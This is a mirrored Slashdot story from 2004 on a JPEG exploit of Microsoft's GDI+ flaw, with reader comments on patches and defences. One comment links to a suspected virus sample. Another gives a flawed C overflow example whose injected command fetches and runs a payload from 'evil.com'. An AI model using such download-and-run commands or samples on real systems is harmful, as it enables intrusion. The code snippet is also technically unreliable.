Slashdot Mirror

← Back to Stories (view on slashdot.org)

First JPEG Virus Posted To Usenet

Posted by timothy on from the one-neck-to-wring dept.

Shawn writes "This could possibly be the worst viruses yet! Earlier this month Microsoft announced a problem in their GDI driver that processes the way JPEG images are displayed. Someone has finally posted an exploit to Usenet. Easynews, a premium Usenet provider, found the virus Sunday afternoon. Up-to-date information about how we found it and what it does is located at www.easynews.com/virus.txt. When this picture is viewed it installs remote management software (winvnc and radmin) and will connect to irc."

23 of 694 comments (clear)

  1. Re:Anyone have a working copy? by JS_RIDDLER · · Score: 5, Informative

    In the article the virus.txt has a jpeg sample in code.

    --
    _JS
  2. Re:Anyone have a working copy? by Anonymous Coward · · Score: 5, Informative

    http://easynews.com/test/possiblevirus.jpg.gz

    Got the link from bugtraq a few hours ago.

  3. Screenshots... by tajmorton · · Score: 5, Funny

    No Screenshots, please!

    --
    Tell the truth and you won't have so much to remember.
  4. Re:Anyone have a working copy? by Anonymous+Freak · · Score: 5, Informative

    Well, Apple's Preview (as of 10.3.5 with all the latest updates as of 6:00 PM PDT, 9/27/04,) says it's not a supported file type.

    Graphic Converter complains that "Some parts of the file may be missing."

    Safari displays a blank page, with no errors.

    In all cases, I can't find any file-system goofiness. (And the free-with-DotMac Virex doesn't detect it as a virus.)

    (The offending "virus" is available as a linked-to zip file in the linked virus.txt page.)

    --
    Another non-functioning site was "uncertainty.microsoft.com."
    The purpose of that site was not known.
  5. alt.binaries.erotica.beanie-babies by drachenfyre · · Score: 5, Funny

    Ok, no offense, but beanie-babies and erotica? There are some newsgroups that just shouldn't exist.

  6. Re:Can be prevented... by Zocalo · · Score: 5, Informative

    Yes it has. Unfortunately like many Microsoft patches it gives you a nice fuzzy sense of false security. According to Microsoft, I'm nice and safe, but according to Tom Liston's GDIScanner and a quick perusal of the file versions, I'm quite possibly not. Fortunately my virusscanner *does* seem to pick up on this, but that's no thanks to Microsoft.

    --
    UNIX? They're not even circumcised! Savages!
  7. The answer is... by Leomania · · Score: 5, Informative

    yes, if you haven't updated to the latest version.

    See this Slashdot thread.

    - Leo

    --
    You don't use science to show that you're right, you use science to become right.
  8. Re:That's pretty amazing. by mini+me · · Score: 5, Informative

    Hopefully mozilla decodes the jpgs itself before rendering them on windows.

    It does. But Mozilla had almost the exact same problem with both BMP and PNG in the last week or two. So it's not just Microsoft who has vulnerable image decoders.

  9. The joys of keeping a campus virus-free by iamlucky13 · · Score: 5, Interesting

    Our university campus has a huge problem with viruses and this is another exciting addition to our collection. I'm sure I'll start seeing on plenty of guy's asking for help getting this removed, after finding out pornstars aren't virus free after all.

    Thankfully, though, this shouldn't cause as much trouble as our current crop of worms. I'm shocked at how dumb our users are, as a whole. We're still having people infected with blaster, over a year after Microsoft patched that vulnerability! Sasser is absolutely rampant. The school even purchased a blanket liscence of Norton, but I would bet less than half of the students have installed it. We have a T3 line providing our outside connection, and it's currently averaging about 7 Mbps combined up/down, because the internal network, which is mostly linked from buidling to building by gigabit fiber, is saturated by virus crap. Although this virus may have a really effective way of spreading, it scares me very little.

  10. Re:That's pretty amazing. by datawar · · Score: 5, Informative

    Are you serious? Of course Slashdot covered those stories too.

    Critical Mozilla, Thunderbird Vulnerabilities

    CERT Warns Of Multiple Vulnerabilities In Libpng

  11. Re:Just begging to be sued by toetagger1 · · Score: 5, Informative

    Google finds a whole lot of exploids for this guy. Ranging from apache to AIM away message buffer over runs.

    --
    who | grep -i blond | date cd ~; unzip; touch; strip; finger; mount; gasp; yes; uptime; umount; sleep
  12. Microsoft Patch by bcreane · · Score: 5, Informative

    FYI, here's the fix from M$ for this exploit: Security Bulletin

  13. God dammit! by Anonymous Coward · · Score: 5, Funny

    Why doesn't slashdot allow you to post images! :)

  14. Re:Can be prevented... by Saratoga+C++ · · Score: 5, Informative

    Sorry to burst your bubble dude, but that patch only fixed the system's instance of GDI+ There are a ton of apps that have their own version of GDI+ built on their own app path. just because you use the patch that doesn't mean that its actually fixed.

    Say your using app X that uses GDI+ to render its own image stuff (say its a picture album maker). It keeps its own version of GDI+ that the developers extended for their own reasons. This GDI+ is vonerable. After patching this older version of GDI+ is still on your system so that app is vonerable...

    So buyer beware.

  15. NX Protection? by rsmith-mac · · Score: 5, Interesting

    Just out of curiosity, does anyone know if x86 no-execute protection(the NX bit, aka the XD bit, aka Data Execution Protection) prevents against this? With the release of SP2 and DEP support, it would seem that this would be a good test to see if DEP is all its cracked up to be.

    1. Re:NX Protection? by Anonymous Coward · · Score: 5, Informative
      I can't speak for this virus specifically, but DEP isn't the end-all-be-all of buffer overflow prevention. For example:
      char overflowed[10];
      char command="echo \"some silly command\"";

      int main(){
      strcpy(argv[1], overflowed);
      exec(command);
      }
      We can overflow overflowed to change command into something like "sh \"wget http:\\evil.com\virus > virus.sh;virus.sh\"" or somesuch. Bonus points if you diddle with the C library's jump table so that any system call ends up being exec(..). The key here is that no data segments are executed, so NX protection wouldn't help.
  16. Re:Anyone have a working copy? by Three+Headed+Man · · Score: 5, Funny

    I extracted the bad code, but I'm having trouble getting it to run in WINE.

    Just one more reason Linux isn't ready for the desktop.

    --
    I'm probably at the karma cap. Mod up a funny troll instead, it lightens the mood :)
  17. Re:I don't see why this is a problem by Waffle+Iron · · Score: 5, Informative
    If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

    It can still do anything the user can do, including installing itself in the user's account space, setting itself to run every time the user logs on, uploading all of the files the user can access, logging the user's keystrokes, sending email, pinging for other systems, etc. Running as a non-administrator is not a panacea.

  18. Hacked CNN Advertisments by 8400_RPM · · Score: 5, Insightful

    So what happens when someone hacks the ad server that cnn or google uses, and puts this jpeg up?

    Millions of instant zombies.

    Thats f*cking scarry....

  19. Re:Not particularly well coded by djeca · · Score: 5, Insightful

    Just had a nasty thought... the latest round of IM programs have user-settable "buddy icons" which IIRC can be JPEGs. A worm that used buddy icons to spread could have half the internet infected in 15 minutes, and do it via existing social networks. I hope the MSN and AIM servers are scanning buddy icons to prevent this being used...

  20. Re:That's pretty amazing. by Doyle · · Score: 5, Funny

    I have to ask, what has MS done that is actually useful since Windows 2000?

    You mean, apart from the sanitation, the medicine, education, wine, public order, irrigation, roads, a fresh water system, and public health?

    Oh, wait - that was the Romans :P

  21. Re:Can be prevented... by Anonymous Coward · · Score: 5, Informative

    while we're bursting bubbles, the patch from microsoft contains a tool that scans your hard disk for all vulnerable gdi dlls.

    Another bubble bites the dust! It detects, but does not fix the problem. Nor does it even tell you where the problem is. This was covered earlier today.

  22. Re:That's pretty amazing. by IchBinEinPenguin · · Score: 5, Informative

    Returning with the same stuff they have now, but with little or no security issues

    Sorry, that won't work.

    Some of the stuff is insecure by design!. Not "designed to be insecure", just "impossible to secure given the design".

    Take ActiveX: running binary code downloaded from a anywhere without a JVM-like sandbox is insecure. Not matter how many digital signatures, OK dialog boxes and warnig messages you add, some (most?) users WILL simply click through all the warnings and have their boxes 0wn3d.

    Design has tradeoffs between security, performance, usability etc. etc. Some of this stuff you can't fix without changing the basic design (i.e. starting from scratch)